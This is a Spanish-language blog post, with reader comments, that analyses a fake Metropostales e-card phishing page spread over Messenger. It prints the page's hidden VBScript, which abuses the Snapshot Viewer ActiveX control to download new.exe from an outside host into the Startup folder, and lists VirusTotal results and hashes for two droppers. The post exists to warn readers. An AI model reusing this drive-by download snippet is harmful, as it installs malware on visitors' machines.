20

Ago

Metropostales Otro virus en la lista:metropostal.exe y new.exe

Hace unos momentos me llego un curioso mensaje de una amiga por el messenger, se trataba de una invitación a ver una postal.

postal-metro2.PNG
Me llamo mucho la atención que el enlace fuera por medio de no-ip.org, que es un dns dinámico, el cual ya he utilizado en diversas ocaciones para poder conectarme a el servidor de la antigue empresa donde trabajaba.

postal-metro.PNG



Revisando el código fuente de la página, me di cuenta de que los autores enlazaron las imágenes desde el sitio de metropostales.com, así se aseguran que la imagen de la página sea igual a la oficial. Sin embargo algo que no hay en la original es este script en VBScript.

<object id="SnapshotViewer1" height="5" width="5" classid="CLSID:F0E42D50-368C-11D0-AD81-00A0C90DC8D9"/>
<script language="VBScript">
<!--
 SnapshotViewer1.SnapshotPath = "http://rpmsancarlos.com/h/new.exe"
 SnapshotViewer1.CompressedPath =   "c:/DOCUME~1/ALLUSE~1/MENINI~1/PROGRA~1/Inicio/explorer.exe"
-->
</script>

Que como pueden intenta instalar un archivo llamado new.exe en el menu inicio de todos los usuarios.

La ruta funciona, y si eres vulnerable al "Exploit Microsoft Access Snapshot Viewer ActiveX Control Vulnerability" entonces tendrás este virus sin hacer nada más que visitar la página. Claro que si usas Firefox y la extensión de NoScript, no tienes nada de que preocuparte, ya que normalmente esos dominios no tienen autorización para ejecutar scripts.

Como es mi costumbre me baje los dos archivitos, tanto metropostal.exe y new.exe, los cuales analice en _Virus total y aquí están los resultados.

Metropostal.exe fue creado apenas ayer, así que esta relativamente nuevo, no obstante esta marcado como peligros por 12 antivirus. Algo a notar es que esta escrito en VB6.

File metropostal.exe received on 08.20.2008 04:04:46 (CET)
AntivirusVersionLast UpdateResult
AhnLab-V32008.8.19.02008.08.19-
AntiVir7.8.1.232008.08.19TR/Crypt.XPACK.Gen
Authentium5.1.0.42008.08.20-
Avast4.8.1195.02008.08.19Win32:Trojan-gen {Other}
AVG8.0.0.1612008.08.20-
BitDefender7.22008.08.20-
CAT-QuickHeal9.502008.08.19(Suspicious) - DNAScan
ClamAV0.93.12008.08.19Trojan.Dropper-4959
DrWeb4.44.0.091702008.08.19-
eSafe7.0.17.02008.08.19-
eTrust-Vet31.6.60362008.08.19-
Ewido4.02008.08.19Dropper.VB.ud
F-Prot4.4.4.562008.08.19-
F-Secure7.60.13501.02008.08.19-
Fortinet3.14.0.02008.08.19-
GData2.0.7306.10232008.08.20Win32:Trojan-gen
IkarusT3.1.1.34.02008.08.20MemScanTrojan.Dropper.VB.AAM
K7AntiVirus7.10.4212008.08.19-
Kaspersky7.0.0.1252008.08.20-
McAfee53642008.08.19-
Microsoft1.38072008.08.20TrojanDropper:Win32/VB.DP
NOD32v233692008.08.19-
Norman5.80.022008.08.19-
Panda9.0.0.42008.08.19Suspicious file
PCTools4.4.2.02008.08.19-
Prevx1V22008.08.20-
Rising20.58.12.002008.08.19-
Sophos4.32.02008.08.20Mal/Dropper-AG
Sunbelt3.1.1546.12008.08.15-
Symantec102008.08.20-
TheHacker6.3.0.5.0542008.08.19-
TrendMicro8.700.0.10042008.08.19PAK_Generic.001
VBA323.12.8.32008.08.19-
ViRobot2008.8.19.13412008.08.20-
VirusBuster4.5.11.02008.08.19-
Webwasher-Gateway6.6.22008.08.19Trojan.Crypt.XPACK.Gen
 
Additional information
Tamano archivo: 62530 bytes
MD5...: 4854a89f5212fce44281102e719450ff
SHA1..: 130bd263e051675d24e334e4d36c6bdb89cfce69
SHA256: ebea513cce2c637a12737b9bae6ac0d229c9d034817031667911095a563cd908
SHA512: 15d1a2854adeb27304c95d4f643372083ef0a45e0018222af2d5563ffc0217b1
5304abc2413c413a85cb461b1e2109fe2f81b3bb7b34082e8e7a7d38cc0634ce
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x401c99
timedatestamp.....: 0x46c84758 (Sun Aug 19 13:36:24 2007)
machinetype.......: 0x14c (I386)

( 4 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x3c98 0x4000 5.54 50a17654766e64f8a48bc5f736f15060
.data 0x5000 0xab4 0x1000 0.00 620f0b67a91f7f74151bc5be745b7110
.rsrc 0x6000 0x10 0x1000 0.01 a85d039edc3540b108709278812b252a
.1data 0x7000 0x5000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e

( 1 imports )
> MSVBVM60.DLL: EVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaVarMove, -, __vbaAryMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, __vbaPut3, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, _adj_fprem1, __vbaI2Abs, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, -, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, -, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, -, _CIsin, __vbaErase, -, -, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaGet3, __vbaPutOwner3, __vbaI2I4, __vbaLbound, __vbaRedimPreserve, _adj_fpatan, Zombie_GetTypeInfoCount, __vbaRedim, EVENT_SINK_Release, __vbaNew, -, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, -, _adj_fprem, _adj_fdivr_m64, -, __vbaFPException, -, __vbaGetOwner3, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, -, __vbaVar2Vec, __vbaNew2, -, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, -, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, -, -, __vbaVarDup, -, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

( 0 exports )

New.exe esta comprimido don UPX, y lo cual lo hace peligroso por definición, ya que recordemos que los ejecutables normales no suelen estar comprimidos ni encriptadas.

Análisis del archivo new.exe recibido el 20.08.2008 17:38:16 (CET)
Motor antivirusVersiónÚltima actualizaciónResultado
AhnLab-V32008.8.19.02008.08.20Win32/NSAnti.suspicious
AntiVir7.8.1.232008.08.20TR/Crypt.ULPM.Gen
Authentium5.1.0.42008.08.20-
Avast4.8.1195.02008.08.20-
AVG8.0.0.1612008.08.20-
BitDefender7.22008.08.20GenPack:Trojan.Dropper.Delf.BBM
CAT-QuickHeal9.502008.08.20-
ClamAV0.93.12008.08.19-
DrWeb4.44.0.091702008.08.20-
eSafe7.0.17.02008.08.20Suspicious File
eTrust-Vet31.6.60372008.08.20-
Ewido4.02008.08.20-
F-Prot4.4.4.562008.08.19-
Fortinet3.14.0.02008.08.20-
GData2.0.7306.10232008.08.20Trojan.Win32.Buzus.rfg
IkarusT3.1.1.34.02008.08.20-
K7AntiVirus7.10.4212008.08.19-
Kaspersky7.0.0.1252008.08.20Trojan.Win32.Buzus.rfg
McAfee53642008.08.19New Malware.bl
Microsoft1.38072008.08.20Trojan:Win32/Buzus.A
NOD32v233712008.08.20-
Norman5.80.022008.08.20-
Panda9.0.0.42008.08.19-
PCTools4.4.2.02008.08.20-
Prevx1V22008.08.20-
Rising20.58.22.002008.08.20-
Sophos4.32.02008.08.20Mal/HckPk-A
Sunbelt3.1.1564.12008.08.20-
Symantec102008.08.20SecurityRisk.Downldr
TheHacker6.3.0.5.0542008.08.19-
TrendMicro8.700.0.10042008.08.20TROJ_BUZUS.QA
VBA323.12.8.32008.08.20Trojan.Win32.Buzus.qdk
ViRobot2008.8.20.13422008.08.20-
VirusBuster4.5.11.02008.08.20-
Webwasher-Gateway6.6.22008.08.20Trojan.Crypt.ULPM.Gen
 
Información adicional
Tamano archivo: 57856 bytes
MD5...: 90a2d4c87a77eea0302e0335f16f2e09
SHA1..: 05bfff7ef4aff3b544cbe47e6ab8f1a3681920cb
SHA256: a835dc928d129d2d6e5ec4b57392f263be5c3b08c2c216f12aaee4e5d199d681
SHA512: 7bf4e42305642e618c7b828f7e2d161a035f208c45db9c75e85b14cd73027486
2465e8b0f55a79888a801043aab0023c38f906ea6692aa4e05124f26de108227
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x418730
timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0xa000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0xb000 0xe000 0xda00 7.99 223288db979476f48f5b84e35693af92
.rsrc 0x19000 0x1000 0x400 2.83 62b3229e36fd278c875a996ba54a4cf8

( 6 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> advapi32.dll: RegCloseKey
> ntdll.dll: NtUnmapViewOfSection
> oleaut32.dll: SysFreeString
> user32.dll: MessageBoxA
> winmm.dll: timeGetTime

( 0 exports )

Debido a que ya no puedo tener instalada la maquina virtual, no puedo ver que hacen estos dos malandros cibernéticos, pero juzgando por el tamaño, me imagino que son solo droppers, es decir que lo que hacen es que una vez que se ejecutan, traen más amiguitos a sus fiesta privada que esta en tu computadora, posiblemente roben tus contraseñas y envíen spam, claro también van a seguir distribuyéndose a más incautos.

Saludos

¿Tu qué opinas?

4 comentarios

hola, pues a mi si me llego una postal que me parecio extraño que me la mandaran, como se si me robaron la contraseña?????ayuda xfa

Cambia de contraseña

Hola anonimo, lo unico que necesitas hacer es cambiar tu contraseña, y asi no importa si la tienen o no.

Saludos

Saludos. cómo se si ya no tengeo le virus
?

jajaja lo bueno que uno aveces se pone buzo en esto por que sino ps ya nos cargo la chin..... jajajaja bueno ps gracias por la info bro por que cuando recibi la dichosa postal no se me iso raro por que aveses las chiks son asi de empalagosas vea pero desde que recivi un virus parecido donde dice que chekes tu foto y te dan un link ps ya me pongo a indagar para ver sus codigos o ver si la pag deverd JAJAJAJAJA PINCH....SSS VIRUS OGTS JAJAJAJA

SALE PUES CUIDENCE....

Escribir un comentario




Sin trackbacks

URL de TrackBack: http://mixelandia.com/MTOS/mt-tb.cgi/925